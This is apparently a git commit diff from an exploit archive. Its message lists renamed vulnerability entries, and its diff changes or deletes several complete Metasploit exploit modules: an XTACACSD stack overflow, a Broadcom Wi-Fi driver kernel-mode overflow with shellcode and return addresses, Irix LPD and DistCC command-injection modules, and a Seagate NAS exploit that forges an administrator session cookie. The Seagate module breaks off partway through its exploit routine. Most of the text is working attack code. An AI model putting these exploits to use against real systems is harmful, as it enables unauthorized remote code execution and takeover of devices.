Scripting PGAUTOPro - SQL Injection / Cross-Site Scripting (1) Joomla! Component Huru Helpdesk - SQL Injection Joomla! Component Huru Helpdesk - SQL Injection (2) SoftwareDEP Classified Script 2.5 - SQL Injection SoftwareDEP Classified Script 2.5 - SQL Injection (1) WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities WordPress Plugin Pay with Tweet 1.1 - Multiple Vulnerabilities Software DEP Classified Script 2.5 - SQL Injection SoftwareDEP Classified Script 2.5 - SQL Injection (2) Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (1) Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (2) Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (1) Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (2) OnlineArts DailyDose 1.1 - Denial of Servicee.pl Remote Command Execution OnlineArts DailyDose 1.1 - 'dose.pl' Remote Command Execution PHPOpenChat 2.3.4/3.0.1 - PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion PHPOpenChat 2.3.4/3.0.1 - PoC.php Remote File Inclusion PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion ActiveNews Manager - 'articleId' Parameter SQL Injection ActiveNews Manager - 'articleId' Parameter SQL Injection (1) Active News Manager - 'articleId' Parameter SQL Injection ActiveNews Manager - 'articleId' Parameter SQL Injection (2) Sagem Fast 3304-V2 - Authentication Bypass Sagem Fast 3304-V2 - Authentication Bypass (1) PG Auto Pro - SQL Injection / Cross-Site Scripting PGAUTOPro - SQL Injection / Cross-Site Scripting (2) Sagem FAST3304-V2 - Authentication Bypass Sagem FAST3304-V2 - Authentication Bypass (2) Trend Micro - Multiple HTTP Problems with CoreServiceShell.exe Trend Micro - 'CoreServiceShell.exe' Multiple HTTP Issues phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers) phpATM 1.32 (Windows) - Arbitrary File Upload / Remote Command Execution Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)
This commit is contained in:
parent
52fd3d8a20
commit
0320cba051
50 changed files with 1005 additions and 3974 deletions
|
@ -1,9 +1,9 @@
|
|||
##
|
||||
# $Id$
|
||||
# $Id: xtacacsd_report.rb 9262 2010-05-09 17:45:00Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -11,8 +11,8 @@
|
|||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Exploit::Brute
|
||||
|
@ -21,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in XTACACSD <= 4.1.2. By
|
||||
sending a specially crafted XTACACS packet with an overly long
|
||||
username, an attacker may be able to execute arbitrary code.
|
||||
This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
|
||||
sending a specially crafted XTACACS packet with an overly long
|
||||
username, an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => 'MC',
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
'Version' => '$Revision: 9262 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2008-7232'],
|
||||
['OSVDB', '58140'],
|
||||
['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
|
||||
|
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisableNops' => 'True',
|
||||
},
|
||||
'Platform' => 'BSD',
|
||||
'Arch' => ARCH_X86,
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
['FreeBSD 6.2-Release Bruteforce',
|
||||
|
@ -59,8 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jan 8 2008'))
|
||||
|
||||
register_options([Opt::RPORT(49)], self.class)
|
||||
|
||||
register_options([Opt::RPORT(49)], self.class)
|
||||
end
|
||||
|
||||
def brute_exploit(address)
|
||||
|
@ -80,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << "\x00\x00\x00\x00" # Result 2
|
||||
sploit << "\x00\x00" # Result 3
|
||||
sploit << make_nops(238 - payload.encoded.length)
|
||||
sploit << payload.encoded + [address['Ret']].pack('V')
|
||||
sploit << payload.encoded + [address['Ret']].pack('V')
|
||||
|
||||
print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
|
||||
print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
|
||||
udp_sock.put(sploit)
|
||||
|
||||
disconnect_udp
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -1,90 +0,0 @@
|
|||
##
|
||||
# $Id: xtacacsd_report.rb 9262 2010-05-09 17:45:00Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Exploit::Brute
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
|
||||
sending a specially crafted XTACACS packet with an overly long
|
||||
username, an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => 'MC',
|
||||
'Version' => '$Revision: 9262 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2008-7232'],
|
||||
['OSVDB', '58140'],
|
||||
['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 175,
|
||||
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
|
||||
'StackAdjustment' => -3500,
|
||||
'PrependEncoder' => "\x83\xec\x7f",
|
||||
'DisableNops' => 'True',
|
||||
},
|
||||
'Platform' => 'BSD',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
['FreeBSD 6.2-Release Bruteforce',
|
||||
{'Bruteforce' =>
|
||||
{
|
||||
'Start' => { 'Ret' => 0xbfbfea00 },
|
||||
'Stop' => { 'Ret' => 0xbfbfef00 },
|
||||
'Step' => 24,
|
||||
}
|
||||
},
|
||||
],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jan 8 2008'))
|
||||
|
||||
register_options([Opt::RPORT(49)], self.class)
|
||||
end
|
||||
|
||||
def brute_exploit(address)
|
||||
connect_udp
|
||||
|
||||
sploit = "\x80" # Version
|
||||
sploit << "\x05" # Type: Connect
|
||||
sploit << "\xff\xff" # Nonce
|
||||
sploit << "\xff" # Username length
|
||||
sploit << "\x00" # Password length
|
||||
sploit << "\x00" # Response
|
||||
sploit << "\x00" # Reason
|
||||
sploit << "\xff\xff\xff\xff" # Result 1
|
||||
sploit << "\xff\xff\xff\xff" # Destination address
|
||||
sploit << "\xff\xff" # Destination port
|
||||
sploit << "\xff\xff" # Line
|
||||
sploit << "\x00\x00\x00\x00" # Result 2
|
||||
sploit << "\x00\x00" # Result 3
|
||||
sploit << make_nops(238 - payload.encoded.length)
|
||||
sploit << payload.encoded + [address['Ret']].pack('V')
|
||||
|
||||
print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
|
||||
udp_sock.put(sploit)
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
||||
end
|
|
@ -1,206 +0,0 @@
|
|||
##
|
||||
# $Id: broadcom_wifi_ssid.rb 9669 2010-07-03 03:13:45Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = LowRanking
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Exploit::KernelMode
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the Broadcom Wireless driver
|
||||
that allows remote code execution in kernel mode by sending a 802.11 probe
|
||||
response that contains a long SSID. The target MAC address must
|
||||
be provided to use this exploit. The two cards tested fell into the
|
||||
00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
|
||||
|
||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Chris Eagle', # initial discovery
|
||||
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>', # the man with the plan
|
||||
'skape', # windows kernel ninjitsu and debugging
|
||||
'hdm' # porting the C version to ruby
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9669 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-5882'],
|
||||
['OSVDB', '30294'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
|
||||
[ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10',
|
||||
{
|
||||
'Ret' => 0x8066662c, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
'Recovery' => 'idlethread_restart',
|
||||
'KiIdleLoopAddress' => 0x804dbb27,
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
],
|
||||
|
||||
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
|
||||
[ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10',
|
||||
{
|
||||
'Ret' => 0x804f16eb, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
'Recovery' => 'idlethread_restart',
|
||||
'KiIdleLoopAddress' => 0x804dc0c7,
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 11 2006'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
|
||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
open_wifi
|
||||
|
||||
stime = Time.now.to_i
|
||||
|
||||
print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...")
|
||||
|
||||
while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)
|
||||
|
||||
select(nil, nil, nil, 0.02)
|
||||
wifi.write(create_response)
|
||||
|
||||
select(nil, nil, nil, 0.01)
|
||||
wifi.write(create_beacon)
|
||||
|
||||
break if session_created?
|
||||
|
||||
end
|
||||
|
||||
print_status("Finished sending frames...")
|
||||
end
|
||||
|
||||
def create_beacon
|
||||
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
|
||||
dst = eton('FF:FF:FF:FF:FF:FF')
|
||||
seq = [Time.now.to_i % 4096].pack('n')
|
||||
|
||||
blob = create_frame
|
||||
blob[0,1] = 0x80.chr
|
||||
blob[4,6] = dst
|
||||
blob[10,6] = src
|
||||
blob[16,6] = src
|
||||
blob[22,2] = seq
|
||||
|
||||
blob
|
||||
end
|
||||
|
||||
def create_response
|
||||
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
|
||||
dst = eton(datastore['ADDR_DST'])
|
||||
seq = [Time.now.to_i % 256].pack('n')
|
||||
|
||||
blob = create_frame
|
||||
blob[0,1] = 0x50.chr
|
||||
blob[4,6] = dst
|
||||
blob[10,6] = src
|
||||
blob[16,6] = src # bssid field, good idea to set to src.
|
||||
blob[22,2] = seq
|
||||
|
||||
blob
|
||||
end
|
||||
|
||||
def create_frame
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
"\x58\x58\x58\x58\x58\x58" + # src
|
||||
"\x58\x58\x58\x58\x58\x58" + # bssid
|
||||
"\x70\xed" + # sequence number
|
||||
|
||||
#
|
||||
# fixed parameters
|
||||
#
|
||||
|
||||
# timestamp value
|
||||
rand_text_alphanumeric(8) +
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x11\x04" + # capability flags
|
||||
|
||||
#
|
||||
# tagged parameters
|
||||
#
|
||||
|
||||
# ssid tag
|
||||
"\x00" + # tag: SSID parameter set
|
||||
"\x5d" + # len: length is 93 bytes
|
||||
|
||||
# jump into the payload
|
||||
"\x89\xf9" + # mov edi, ecx
|
||||
"\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b
|
||||
"\xff\xe1" + # jmp ecx
|
||||
|
||||
# padding
|
||||
rand_text_alphanumeric(79) +
|
||||
|
||||
# return address
|
||||
[target.ret].pack('V') +
|
||||
|
||||
# vendor specific tag
|
||||
"\xdd" + # wpa
|
||||
"\xff" + # big as we can make it
|
||||
|
||||
# the kernel-mode stager
|
||||
payload.encoded
|
||||
end
|
||||
|
||||
end
|
|
@ -1,32 +1,31 @@
|
|||
##
|
||||
# $Id$
|
||||
# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Irix LPD tagprinter Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution flaw in
|
||||
the in.lpd service shipped with all versions of Irix.
|
||||
This module exploits an arbitrary command execution flaw in
|
||||
the in.lpd service shipped with all versions of Irix.
|
||||
},
|
||||
'Author' => [ 'optyx', 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'Version' => '$Revision: 10561 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2001-0800'],
|
||||
|
@ -45,18 +44,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DisclosureDate' => 'Sep 01 2001',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515)
|
||||
], self.class)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -64,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock.put("T;uname -a;\n")
|
||||
resp = sock.get_once
|
||||
disconnect
|
||||
|
||||
|
||||
if (resp =~ /IRIX/)
|
||||
print_status("Response: #{resp.strip}")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
connect
|
||||
sock.put("T;#{payload.encoded};\n")
|
||||
|
|
|
@ -1,81 +0,0 @@
|
|||
##
|
||||
# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Irix LPD tagprinter Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution flaw in
|
||||
the in.lpd service shipped with all versions of Irix.
|
||||
},
|
||||
'Author' => [ 'optyx', 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 10561 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2001-0800'],
|
||||
['OSVDB', '8573'],
|
||||
['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['unix', 'irix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 512,
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DisclosureDate' => 'Sep 01 2001',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
sock.put("T;uname -a;\n")
|
||||
resp = sock.get_once
|
||||
disconnect
|
||||
|
||||
if (resp =~ /IRIX/)
|
||||
print_status("Response: #{resp.strip}")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
sock.put("T;#{payload.encoded};\n")
|
||||
handler
|
||||
print_status("Payload: #{payload.encoded}")
|
||||
end
|
||||
|
||||
end
|
|
@ -1,132 +0,0 @@
|
|||
##
|
||||
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'DistCC Daemon Command Execution',
|
||||
'Description' => %q{
|
||||
This module uses a documented security weakness to execute
|
||||
arbitrary commands on any system running distccd.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9669 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-2687'],
|
||||
[ 'OSVDB', '13378' ],
|
||||
[ 'URL', 'http://distcc.samba.org/security.html'],
|
||||
|
||||
],
|
||||
'Platform' => ['unix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic perl ruby bash telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Feb 01 2002'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(3632)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
distcmd = dist_cmd("sh", "-c", payload.encoded);
|
||||
sock.put(distcmd)
|
||||
|
||||
dtag = rand_text_alphanumeric(10)
|
||||
sock.put("DOTI0000000A#{dtag}\n")
|
||||
|
||||
res = sock.get_once(24, 5)
|
||||
|
||||
if !(res and res.length == 24)
|
||||
print_status("The remote distccd did not reply to our request")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
# Check STDERR
|
||||
res = sock.get_once(4, 5)
|
||||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
return if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
print_status("stderr: #{line}")
|
||||
end
|
||||
end
|
||||
|
||||
# Check STDOUT
|
||||
res = sock.get_once(4, 5)
|
||||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
return if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
print_status("stdout: #{line}")
|
||||
end
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
# Generate a distccd command
|
||||
def dist_cmd(*args)
|
||||
|
||||
# Convince distccd that this is a compile
|
||||
args.concat(%w{# -c main.c -o main.o})
|
||||
|
||||
# Set distcc 'magic fairy dust' and argument count
|
||||
res = "DIST00000001" + sprintf("ARGC%.8x", args.length)
|
||||
|
||||
# Set the command arguments
|
||||
args.each do |arg|
|
||||
res << sprintf("ARGV%.8x%s", arg.length, arg)
|
||||
end
|
||||
|
||||
return res
|
||||
end
|
||||
|
||||
end
|
||||
|
|
@ -1,353 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rexml/document'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Seagate Business NAS Unauthenticated Remote Command Execution',
|
||||
'Description' => %q{
|
||||
Some Seagate Business NAS devices are vulnerable to command execution via a local
|
||||
file include vulnerability hidden in the language parameter of the CodeIgniter
|
||||
session cookie. The vulnerability manifests in the way the language files are
|
||||
included in the code on the login page, and hence is open to attack from users
|
||||
without the need for authentication. The cookie can be easily decrypted using a
|
||||
known static encryption key and re-encrypted once the PHP object string has been
|
||||
modified.
|
||||
This module has been tested on the STBN300 device.
|
||||
},
|
||||
'Author' => [
|
||||
'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2014-8684'],
|
||||
['CVE', '2014-8686'],
|
||||
['CVE', '2014-8687'],
|
||||
['EDB', '36202'],
|
||||
['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'],
|
||||
['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/']
|
||||
],
|
||||
'DisclosureDate' => 'Mar 01 2015',
|
||||
'Privileged' => true,
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Payload' => {'DisableNops' => true},
|
||||
'Targets' => [['Automatic', {}]],
|
||||
'DefaultTarget' => 0,
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
|
||||
OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']),
|
||||
OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']),
|
||||
OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07'])
|
||||
])
|
||||
end
|
||||
|
||||
#
|
||||
# Write a string value to a serialized PHP object without deserializing it first.
|
||||
# If the value exists it will be updated.
|
||||
#
|
||||
def set_string(php_object, name, value)
|
||||
prefix = "s:#{name.length}:\"#{name}\";s:"
|
||||
if php_object.include?(prefix)
|
||||
# the value already exists in the php blob, so update it.
|
||||
return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"")
|
||||
end
|
||||
|
||||
# the value doesn't exist in the php blob, so create it.
|
||||
count = php_object.split(':')[1].to_i + 1
|
||||
php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}")
|
||||
end
|
||||
|
||||
#
|
||||
# Findez ze holez!
|
||||
#
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri),
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
headers = res.to_s
|
||||
|
||||
# validate headers
|
||||
if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
|
||||
# and make sure that the body contains the title we'd expect
|
||||
if res.body.include?('Login to BlackArmor')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
# something went wrong, assume safe.
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
#
|
||||
# Executez ze sploitz!
|
||||
#
|
||||
def exploit
|
||||
|
||||
# Step 1 - Establish a session with the target which will give us a PHP object we can
|
||||
# work with.
|
||||
begin
|
||||
print_status("Establishing session with target ...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri),
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/
|
||||
cookie_value = $1.strip
|
||||
else
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
end
|
||||
|
||||
# Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly
|
||||
# then update it so that it's an admin session before re-encrypting
|
||||
print_status("Upgrading session to administrator ...")
|
||||
php_object = decode_cookie(cookie_value)
|
||||
vprint_status("PHP Object: #{php_object}")
|
||||
|
||||
admin_php_object = set_string(php_object, 'is_admin', 'yes')
|
||||
admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT'])
|
||||
vprint_status("Admin PHP object: #{admin_php_object}")
|
||||
|
||||
admin_cookie_value = encode_cookie(admin_php_object)
|
||||
|
||||
# Step 3 - Extract the current host configuration so that we don't lose it.
|
||||
host_config = nil
|
||||
|
||||
# This time value needs to be consistent across calls
|
||||
config_time = ::Time.now.to_i
|
||||
|
||||
begin
|
||||
print_status("Extracting existing host configuration ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'),
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
},
|
||||
'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}",
|
||||
'vars_get' => {
|
||||
'_' => config_time
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
res.body.split("\r\n").each do |l|
|
||||
if l.include?('general_setup')
|
||||
host_config = l
|
||||
break
|
||||
end
|
||||
end
|
